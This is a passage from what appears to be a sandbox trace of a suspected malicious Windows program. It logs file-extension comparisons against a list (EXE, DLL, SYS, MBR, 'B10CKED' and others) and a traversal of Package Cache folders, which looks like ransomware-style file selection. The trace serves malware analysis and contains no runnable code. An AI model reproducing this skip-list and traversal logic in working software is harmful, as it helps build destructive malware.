returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="ISW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXW", cchCount2=3) 
returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", 
cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, 
lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.080] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.081] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.082] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.082] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.082] FindClose 
(in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.082] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.114] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.114] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL 
USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.148] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.148] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0110.149] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.149] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 